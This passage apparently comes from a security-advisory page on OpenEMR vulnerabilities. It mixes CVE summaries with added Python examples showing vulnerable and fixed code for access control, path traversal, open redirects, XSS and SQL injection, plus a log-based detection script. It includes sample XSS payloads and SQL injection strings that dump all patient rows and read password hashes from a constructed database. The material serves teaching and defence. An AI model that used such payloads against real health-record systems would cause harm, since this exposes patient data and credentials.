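        return list(CARE_TEAMS)
    return [ct for ct in CARE_TEAMS if ct["patient"] == patient_param]

def message_list_vulnerable(principal, show_all=False):
    """Flawed: show_all is honoured for anyone; only the UI hid the control from non-admins."""
    if show_all:
        return list(MESSAGES)
    return [m for m in MESSAGES if m["owner"] == principal.user_id]

def message_list_fixed(principal, show_all=False):
    """Hardened: the privilege behind the parameter is checked on the server on every request."""
    if show_all:
        if principal.role != "admin":
            raise Forbidden("show_all requires the admin role")
        return list(MESSAGES)
    return [m for m in MESSAGES if m["owner"] == principal.user_id]
```

The design point is that the filter derives from the credential, not from the request: a patient token with patient_context "p-100" gets ct-1 whether it asks for nothing, for p-100, or (refused) for p-200, and a receptionist asking for show_all gets a Forbidden rather than the whole mailbox. Refusing instead of narrowing costs nothing and turns probing into a detectable event.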
EPSS 0% CVSS 8.8
HIGH POC PATCH This Week

SQL injection in OpenEMR's Immunization module prior to version 8.0.0 enables authenticated users to execute arbitrary database queries through unparameterized patient_id inputs. This allows attackers to exfiltrate protected health information and stored credentials and, depending on the database account's privileges and the server configuration, potentially achieve remote code execution and complete database compromise. Public exploit code exists for this vulnerability; organizations should upgrade to version 8.0.0 immediately.

RCE SQLi Openemr
NVD GitHub
EPSS 0% CVSS 4.5
MEDIUM PATCH This Month

OpenEMR versions prior to 8.0.0 expose complete contact details for all users, organizations, and patients to authenticated attackers with specific FHIR export and location read permissions. The vulnerability requires administrator-enabled OAuth2 confidential client access, limiting exploitation to high-trust server-to-server integrations with established relationships. This information disclosure affects OpenEMR deployments since 2023 and can be mitigated by upgrading to version 8.0.0 or later.

Information Disclosure Openemr
NVD GitHub
EPSS 0% CVSS 8.8
HIGH POC PATCH This Week

OpenEMR versions prior to 8.0.0 contain a broken access control flaw in the order types management system that allows low-privilege users (such as receptionists) to create and modify procedure types without proper authorization. Public exploit code exists for this vulnerability, which has a CVSS score of 8.8 and could enable unauthorized users to manipulate critical medical procedure data. The vulnerability has been patched in version 8.0.0 and later.

PHP Openemr
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM POC PATCH This Month

OpenEMR versions prior to 8.0.0 fail to properly enforce permission checks, allowing authenticated users to access sensitive information belonging to other authorized users. The vulnerability requires valid credentials and network access but does not enable data modification or denial of service. Public exploit code exists and a patch is available in version 8.0.0 and later.

Authentication Bypass Openemr
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM POC PATCH This Month

OpenEMR prior to version 8.0.0 allows low-privileged users to export sensitive patient and medical data through the message_list.php report functionality because of missing access controls. Receptionists and similar roles can bypass the authorization the UI implies and extract entire message databases containing confidential information. Public exploit code exists for this issue, and a patch is available in version 8.0.0 and later.

PHP CSRF Openemr
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM POC PATCH This Month

OpenEMR versions before 8.0.0 contain an improper access control flaw in the edih_main.php endpoint that allows any authenticated user, including low-privilege accounts like Receptionists, to retrieve sensitive EDI log files by manipulating the log_select parameter. The vulnerability bypasses role-based access controls that should restrict access through the GUI, enabling unauthorized disclosure of system logs. Public exploit code exists for this issue, which is fixed in version 8.0.0.

PHP Openemr
NVD GitHub
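Several entries above (edih_main.php with log_select, the Message Center show_all parameter, the message_list.php report) describe endpoints that the GUI hides from low-privilege roles but that answer direct requests. Until a deployment is on 8.0.0, the practical check is retrospective: look for those scripts and parameters being requested by roles that have no business using them. Below is an added detection example written for this page, not a tool OpenEMR ships. The log format, the role names and the sample lines are constructed; the script and parameter names are the ones the entries cite, and the sample paths are illustrative.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed application log format: "<ts> user=<login> role=<role> <METHOD> <path?query> <status>".
LOG_RE = re.compile(
    r"^(?P<ts>\S+) user=(?P<user>\S+) role=(?P<role>\S+) "
    r"(?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$"
)

# (finding label, path suffix or None for any path, query parameter that must be present
#  or None, roles that legitimately use it). Role names are assumptions for the example.
RULES = [
    ("EDI log read via edih_main.php log_select", "edih_main.php", "log_select", {"admin"}),
    ("Message Center show_all by non-admin", None, "show_all", {"admin"}),
    ("message_list.php report by low-privilege role", "message_list.php", None, {"admin", "clinician"}),
]

def parse_line(line):
    """Return a dict with path and parsed query parameters, or None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["url"])
    rec["path"] = parts.path
    rec["params"] = parse_qs(parts.query)
    return rec

def evaluate(lines, rules=RULES):
    """Return (ts, user, role, status, label) for every request that hits a gated script or
    parameter from a role the rule does not allow. Status 200 means the bypass likely worked."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for label, path_suffix, param, allowed_roles in rules:
            if path_suffix is not None and not rec["path"].endswith(path_suffix):
                continue
            if param is not None and param not in rec["params"]:
                continue
            if rec["role"] in allowed_roles:
                continue
            findings.append((rec["ts"], rec["user"], rec["role"], rec["status"], label))
    return findings

# Constructed sample lines; paths are illustrative, not verified OpenEMR locations.
SAMPLE_LOG = [
    "2026-03-01T10:00:00Z user=rcpt1 role=receptionist GET /interface/billing/edih_main.php?log_select=2026-02.log 200",
    "2026-03-01T10:01:00Z user=admin1 role=admin GET /interface/billing/edih_main.php?log_select=2026-02.log 200",
    "2026-03-01T10:02:00Z user=rcpt1 role=receptionist GET /interface/main/messages/messages.php?show_all=1 200",
    "2026-03-01T10:03:00Z user=doc1 role=clinician GET /interface/main/messages/messages.php 200",
    "2026-03-01T10:04:00Z user=rcpt1 role=receptionist GET /interface/reports/message_list.php 200",
    "garbage line",
]
```

On the sample, the three receptionist requests are flagged and the admin and clinician requests are not. The rules are deliberately keyed on script name plus parameter rather than on full paths, since the same script can be reached under more than one URL prefix; the role field is the part most deployments will have to join in from the application's own user table or audit log.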
EPSS 0% CVSS 9.9
CRITICAL POC PATCH Act Now

Path traversal in OpenEMR before the fixed release allows authenticated users to read arbitrary files on the server, potentially exposing patient health data and the application's own configuration files. A public PoC and a patch are available.

PHP Openemr
NVD GitHub Exploit-DB VulDB
EPSS 0% CVSS 6.1
MEDIUM POC PATCH This Month

OpenEMR versions up to 8.0.0 are affected by URL redirection to an untrusted site (open redirect) (CVSS 6.1).

Open Redirect Openemr
NVD GitHub
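The path traversal entry and the open redirect entry above are both failures to confine a user-supplied locator. As an added example for this page (not OpenEMR's code), the two checks below resolve the input first and then test the result against a fixed boundary: a document name must stay under the document root after realpath(), and a redirect target must be a same-site path or an absolute URL to an allow-listed host. The document root and the allowed hostname are assumptions.

```python
import os
from urllib.parse import urlsplit

DOCUMENT_ROOT = "/srv/emr-docs"                 # assumed location of the document store
ALLOWED_REDIRECT_HOSTS = ("emr.example.org",)   # assumed public hostname of this deployment

def safe_document_path(root, user_supplied):
    """Resolve a user-supplied document name under root and refuse anything that escapes it.
    realpath() collapses '..' segments and symlinks, and os.path.join() returns an absolute
    user_supplied unchanged, so the containment test must run on the resolved result."""
    root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root, user_supplied))
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError("path escapes the document root")
    return candidate

def safe_redirect_target(target, allowed_hosts=ALLOWED_REDIRECT_HOSTS):
    """Return target only if it is a same-site path or an absolute URL to an allow-listed host;
    otherwise fall back to the application root."""
    target = target.strip()
    parts = urlsplit(target)
    if parts.scheme == "" and parts.netloc == "":
        # Relative path. Reject '//host' (protocol-relative) and '/\host' (browser-tolerated).
        if target.startswith("/") and not target.startswith(("//", "/\\")):
            return target
        return "/"
    # Compare the parsed hostname, not a prefix of the string: 'https://good@evil/' has
    # hostname 'evil', and 'javascript:' has no host at all.
    if parts.scheme in ("http", "https") and parts.hostname in allowed_hosts:
        return target
    return "/"
```

Both functions fail closed: an unexpected input produces an exception or the root path, never a partially cleaned value. Stripping "../" from the input instead of resolving it is the classic mistake in the path case (it is trivially bypassed by "....//"), and prefix-matching the URL string instead of the parsed host is the classic mistake in the redirect case.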
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

Cross-site scripting (XSS) in OpenEMR prior to version 8.0.0 allows an attacker who can write to the translation database to inject malicious scripts, because the `xl()` function returns unescaped strings that are then used directly in the application without context-specific escaping. No application account is needed for the payload to fire in victims' browsers, but the precondition of database write access makes this mainly a second-stage issue, chained after SQL injection or a compromised database account, rather than an entry point on its own. A successful injection executes arbitrary JavaScript in users' browsers and can compromise sensitive patient data or application functionality. The vulnerability is resolved in OpenEMR 8.0.0 and later versions.

XSS Openemr
NVD GitHub
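The `xl()` entry above and the stored XSS entries earlier on this page (encounter forms, the ub04 helper) come down to one discipline: a string fetched from the database is data, and the escaping it needs depends on the sink it lands in. The following added example, written for this page and not taken from OpenEMR, renders a poisoned translation and two stored values into text, attribute and script contexts, once raw and once through a context-specific escaper, and reports which contexts let the payload through. The translation table, the payloads and the crude leak oracle are constructed.

```python
import html
import json

# Constructed payloads, one per output context.
PAYLOAD_TEXT = "<img src=x onerror=alert(document.cookie)>"   # stored as a 'translation'
PAYLOAD_ATTR = '" autofocus onfocus="alert(1)'                # stored form-field value
PAYLOAD_JS = "';alert(1);//"                                   # value echoed into a script block

TRANSLATIONS = {"Patient name": PAYLOAD_TEXT}   # constructed translation table with one poisoned row

def xl_like(key, table=TRANSLATIONS):
    """Stand-in for a translation lookup that returns the stored string untouched."""
    return table.get(key, key)

def render_vulnerable(label, value):
    """Translated label and stored value dropped raw into text, attribute and script contexts."""
    return (f"<label>{label}</label>"
            f'<input value="{value}">'
            f"<script>var v = '{value}';</script>")

def esc_text(s):
    return html.escape(s, quote=False)

def esc_attr(s):
    return html.escape(s, quote=True)          # also neutralises both quote characters

def esc_js(s):
    # JSON-encode, then escape '/' and the U+2028/2029 line terminators so the literal
    # can neither close a </script> tag nor break the script parser.
    return (json.dumps(s).replace("/", "\\/")
            .replace("\u2028", "\\u2028").replace("\u2029", "\\u2029"))

def render_fixed(label, value):
    """Each sink gets the escaper for its own context."""
    return (f"<label>{esc_text(label)}</label>"
            f'<input value="{esc_attr(value)}">'
            f"<script>var v = {esc_js(value)};</script>")

def leaked_contexts(markup):
    """Crude oracle: which payload survived in a form the browser would act on."""
    leaks = []
    if "<img" in markup:
        leaks.append("text")
    if 'value="" autofocus' in markup:
        leaks.append("attr")
    if "';alert(1);//" in markup:
        leaks.append("js")
    return leaks

def demo(render):
    """Render the poisoned translation and both stored values; return the contexts that leaked."""
    out = render(xl_like("Patient name"), PAYLOAD_ATTR) + render(xl_like("Address"), PAYLOAD_JS)
    return leaked_contexts(out)
```

demo(render_vulnerable) reports all three contexts; demo(render_fixed) reports none. The reason a single "escape everything" helper is not enough is visible in the attribute and script cases: HTML entity encoding does nothing for a value inside a JavaScript string, and JSON encoding does nothing for a value inside an HTML attribute, so the escaper has to be chosen at the point of output.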
EPSS 0% CVSS 8.7
HIGH POC PATCH This Week

OpenEMR is a free and open source electronic health records and medical practice management application. [CVSS 8.7 HIGH]

XSS Privilege Escalation Openemr
NVD GitHub
EPSS 0% CVSS 5.0
MEDIUM POC PATCH This Month

OpenEMR versions up to 7.0.4 are affected by user interface (UI) misrepresentation of critical information (CVSS 5.0).

Information Disclosure Openemr
NVD GitHub
EPSS 0% CVSS 8.1
HIGH POC PATCH This Week

OpenEMR is a free and open source electronic health records and medical practice management application. [CVSS 8.1 HIGH]

Authentication Bypass Openemr
NVD GitHub
EPSS 0% CVSS 5.4
MEDIUM POC PATCH This Month

OpenEMR is a free and open source electronic health records and medical practice management application. Versions 5.0.0.5 through 7.0.3.4 have a stored cross-site scripting vulnerability in the ub04 helper of the billing interface. [CVSS 5.4 MEDIUM]

XSS Openemr
NVD GitHub
EPSS 0% CVSS 8.8
HIGH POC PATCH This Week

OpenEMR is a free and open source electronic health records and medical practice management application. Versions prior to 7.0.4 have a broken access control in the Profile Edit endpoint. [CVSS 8.8 HIGH]

Authentication Bypass Openemr
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM POC PATCH This Month

OpenEMR is a free and open source electronic health records and medical practice management application. Versions prior to 7.0.4 have a vulnerability where sensitive data is unintentionally revealed to unauthorized parties. [CVSS 6.5 MEDIUM]

Information Disclosure Openemr
NVD GitHub
EPSS 0% CVSS 5.4
MEDIUM POC This Month

OpenEMR 5.0.2.1 contains a cross-site scripting vulnerability that allows authenticated attackers to inject malicious JavaScript through user profile parameters. [CVSS 5.4 MEDIUM]

XSS Openemr
NVD Exploit-DB VulDB
EPSS 1% CVSS 7.6
HIGH POC This Month

OpenEMR is a free and open source electronic health records and medical practice management application. This vulnerability is rated high severity (CVSS 7.6) and is remotely exploitable with low attack complexity. Public exploit code is available and no vendor patch is available.

XSS Openemr
NVD GitHub
EPSS 1% CVSS 5.4
MEDIUM POC This Month

OpenEMR is a free and open source electronic health records and medical practice management application. This vulnerability is rated medium severity (CVSS 5.4) and is remotely exploitable with low attack complexity. Public exploit code is available and no vendor patch is available.

Information Disclosure Openemr
NVD GitHub
EPSS 1% CVSS 7.6
HIGH POC This Month

OpenEMR is a free and open source electronic health records and medical practice management application. This vulnerability is rated high severity (CVSS 7.6) and is remotely exploitable with low attack complexity. Public exploit code is available and no vendor patch is available.

XSS Openemr
NVD GitHub
EPSS 0% CVSS 9.8
CRITICAL POC Act Now

OpenEMR 7.0.2 is vulnerable to SQL injection via \openemr\library\classes\Pharmacy.class.php, \controllers\C_Pharmacy.class.php and \openemr\controller.php. Rated critical severity (CVSS 9.8), the vulnerability is remotely exploitable with no authentication required and low attack complexity. Public exploit code is available and no vendor patch is available.

PHP SQLi Openemr
NVD GitHub
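Four entries on this page are SQL injection through identifiers that reach the query unparameterized: the prescription listing, the 9.9 medical-records injection, the Immunization module's patient_id and the Pharmacy classes above. The block below is an added example written for this page, not OpenEMR code: a Python/sqlite3 stand-in for the PHP/MySQL original with a constructed two-table schema, the interpolated query beside the bound one, and the two inputs that turn a patient lookup into a full dump and a credential read. Table and column names are assumptions.

```python
import sqlite3

def build_db():
    """Constructed schema and rows, not OpenEMR's; enough to show the failure mode."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        CREATE TABLE immunizations(id INTEGER, patient_id INTEGER, vaccine TEXT);
        INSERT INTO users VALUES (1, 'admin', '$2y$10$examplehash');
        INSERT INTO immunizations VALUES (1, 100, 'MMR'), (2, 200, 'HepB'), (3, 200, 'Tdap');
    """)
    return db

def list_immunizations_vulnerable(db, patient_id):
    """Flawed: the request parameter is interpolated into the statement text."""
    sql = (f"SELECT vaccine, patient_id FROM immunizations "
           f"WHERE patient_id = {patient_id} ORDER BY id")
    return db.execute(sql).fetchall()

def list_immunizations_fixed(db, patient_id):
    """Hardened: validate the identifier's type, then bind it. A bound value is data; it
    cannot append a UNION or rewrite the WHERE clause."""
    pid = int(patient_id)   # "0 OR 1=1" raises ValueError before any SQL runs
    return db.execute(
        "SELECT vaccine, patient_id FROM immunizations WHERE patient_id = ? ORDER BY id",
        (pid,),
    ).fetchall()

# The two outcomes the entries above warn about, as an attacker would send them.
DUMP_ALL_PATIENTS = "0 OR 1=1"
STEAL_CREDENTIALS = "0 UNION SELECT username, password FROM users -- "
```

Against build_db(), the interpolated query returns every patient's rows for DUMP_ALL_PATIENTS and the admin password hash for STEAL_CREDENTIALS (the trailing comment swallows the ORDER BY so the compound select parses); the bound query rejects both before touching the database. The integer cast is belt-and-braces on top of binding, and it is the right move for any identifier that is numeric by definition, since it also produces a clean 4xx instead of a database error for malformed input.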
EPSS 1% CVSS 7.0
HIGH POC This Week

OpenEMR is a free and open source electronic health records and medical practice management application. This vulnerability is rated high severity (CVSS 7.0) and is remotely exploitable. Public exploit code is available and no vendor patch is available.

XSS Openemr
NVD GitHub
EPSS 1% CVSS 6.9
MEDIUM POC PATCH This Month

OpenEMR is a free and open source electronic health records and medical practice management application. This vulnerability is rated medium severity (CVSS 6.9) and is remotely exploitable without authentication and with low attack complexity. Public exploit code is available.

SSRF Openemr
NVD GitHub
EPSS 1% CVSS 8.4
HIGH POC This Week

OpenEMR is a free and open source electronic health records and medical practice management application. This vulnerability is rated high severity (CVSS 8.4) and is remotely exploitable with low attack complexity. Public exploit code is available and no vendor patch is available.

XSS Openemr
NVD GitHub
EPSS 1% CVSS 6.4
MEDIUM POC PATCH This Month

OpenEMR is a free and open source electronic health records and medical practice management application. This vulnerability is rated medium severity (CVSS 6.4) and is remotely exploitable. Public exploit code is available.

PHP XSS Openemr
NVD GitHub
EPSS 1% CVSS 7.2
HIGH POC PATCH This Week

OpenEMR is a free and open source electronic health records and medical practice management application. This vulnerability is rated high severity (CVSS 7.2) and is remotely exploitable. Public exploit code is available.

PHP XSS Openemr
NVD GitHub
EPSS 0% CVSS 4.6
MEDIUM POC PATCH This Month

OpenEMR is a free and open source electronic health records and medical practice management application. This vulnerability is rated medium severity (CVSS 4.6) and is remotely exploitable with low attack complexity. Public exploit code is available.

Path Traversal Openemr
NVD GitHub
